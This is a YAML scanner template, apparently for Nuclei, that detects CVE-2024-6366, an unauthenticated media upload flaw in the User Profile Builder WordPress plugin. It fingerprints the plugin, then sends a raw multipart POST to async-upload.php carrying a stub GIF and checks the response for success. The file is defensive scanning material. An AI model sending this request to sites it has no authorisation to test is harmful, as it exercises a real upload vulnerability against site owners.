89 lines
2.4 KiB
YAML
89 lines
2.4 KiB
YAML
id: CVE-2024-6366
|
|
|
|
info:
|
|
name: User Profile Builder < 3.11.8 - File Upload
|
|
author: securityforeveryone
|
|
severity: high
|
|
description: |
|
|
The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/
|
|
- https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-6366
|
|
classification:
|
|
cve-id: CVE-2024-6366
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09351
|
|
metadata:
|
|
vendor: cozmoslabs
|
|
product: user-profile-builder
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/profile-builder"
|
|
tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
variables:
|
|
filename: "{{to_lower(rand_text_alpha(12))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body,"/plugins/profile-builder")'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/async-upload.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
|
|
|
|
------WebKitFormBoundary7MA4YWxkTrZu0gW
|
|
Content-Disposition: form-data; name="wppb_upload"
|
|
|
|
true
|
|
------WebKitFormBoundary7MA4YWxkTrZu0gW
|
|
Content-Disposition: form-data; name="meta_name"
|
|
|
|
{{filename}}.gif
|
|
------WebKitFormBoundary7MA4YWxkTrZu0gW
|
|
Content-Disposition: form-data; name="_wpnonce"
|
|
|
|
e8
|
|
------WebKitFormBoundary7MA4YWxkTrZu0gW
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
upload-attachment
|
|
------WebKitFormBoundary7MA4YWxkTrZu0gW
|
|
Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.gif"
|
|
Content-Type: image/jpeg
|
|
|
|
GIF89a
|
|
|
|
------WebKitFormBoundary7MA4YWxkTrZu0gW--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"success":true'
|
|
- '"id"'
|
|
- '"uploadedTo"'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'Content-Type: text/plain'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|